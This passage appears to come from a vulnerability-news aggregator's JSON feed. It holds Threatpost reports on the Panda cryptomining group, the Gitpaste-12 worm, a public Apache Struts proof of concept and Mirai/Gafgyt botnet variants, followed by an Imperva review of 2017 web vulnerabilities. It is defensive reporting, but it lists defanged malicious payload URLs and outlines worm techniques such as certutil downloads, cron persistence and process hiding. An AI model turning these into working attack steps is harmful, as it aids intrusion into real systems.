organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4-300x275.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T17:40:51", "description": "Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).\n\nOf note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available \u2013 leading researchers to call it \u201cGitpaste-12.\u201d It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.\n\n\u201cNo malware is good to have, but worms are particularly annoying,\u201d said researchers with Juniper Threat Labs [in a Thursday post](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>). \u201cTheir ability to [spread in an automated fashion](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>) can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe first phase of the attack is the initial system compromise. The malware\u2019s various attack modules include 11 previously-disclosed vulnerabilities. That includes flaws in [Apache Struts (CVE-2017-5638),](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) and [Tenda routers (CVE-2020-10987).](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>)\n\nThe malware will attempt to use known exploits for these flaws to compromise systems and may also attempt to brute force passwords, said researchers. After compromising a system, a main shell script is then uploaded to the victim machine, and starts to download and execute other components of Gitpaste-12.\n\n## **The Malware **\n\nThis script sets up a cron job it downloads from Pastebin. A cron job is a time-based job scheduler in Unix-like computer operating systems. The cron job calls a script and executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.\n\nIt then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it. The script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities. These include stripping the system\u2019s defenses, including firewall rules, selinux (a security architecture for LinuxR systems), apparmor (a Linux kernel security module that allows the system administrator to restrict programs\u2019 capabilities), as well as common attack prevention and monitoring software.\n\n[![Gitpaste-12 devices](https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/06121832/gitpaste-300x203.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/06121832/gitpaste.png>)\n\nThe 11 vulnerabilities utilized for Gitpaste-12\u2019s initial attack vectors. Credit: Juniper Labs\n\nThe malware also has some commands that disable cloud security agents, \u201cwhich clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent,\u201d said researchers.\n\nGitpaste-12 also features commands allowing it to run a cryptominer that targets the Monero cryptocurrency.\n\n\u201cIt also prevents administrators from collecting information about running processes by intercepting \u2018readdir\u2019 system calls and skip directories for processes like tcpdump, sudo, openssl, etc. in \u2018/proc\u2019,\u201d said researchers. \u201cThe \u2018/proc\u2019 directory in Linux contains information about running processes. It is used, for example, by the \u2018ps\u2019 command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\u201d\n\nFinally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads and executes Pastebin files )https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.\n\nResearchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. \u201cThis should stop the proliferation of this botnet,\u201d said researchers.\n\n## **Wormable Features**\n\nIn terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate and spread the malware.\n\n\u201cThe malware chooses a random /8 CIDR for attack and will try all addresses within that range,\u201d according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses and for IP routing \u2013 meaning that the attack targets all IP addresses within the random CIDR\u2019s range.\n\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands, said researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks; while port 30005 is a bidirectional SOAP/HTTP-based protocol, which provides communication between devices like routers or network switches, and auto-configuration servers.\n\nWorms can have a widespread impact, [as seen in a 2019 campaign](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems, using a wormable exploit. Researchers said that currently more than 3.5 million servers were at risk from the attacks.\n\nSeveral new worms have popped up in 2020 so far, [including the Golang worm](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>), which is aimed at installing cryptominers, and recently changed up its tactics to add attacks on Windows servers and a new pool of exploits to its bag of tricks.\n\nIn August,[ a cryptomining worm](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\n**Hackers Put Bullseye on Healthcare: **[**On Nov. 18 at 2 p.m. EDT**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** find out why hospitals are getting hammered by ransomware attacks in 2020. **[**Save your spot for this FREE webinar**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this **[**LIVE**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)**, limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-06T17:34:00", "type": "threatpost", "title": "Gitpaste-12 Worm Targets Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5948", "CVE-2017-14135", "CVE-2017-5638", "CVE-2020-10987"], "modified": "2020-11-06T17:34:00", "id": "THREATPOST:7B2EAFA107D335014D553D78946C453E", "href": "https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": 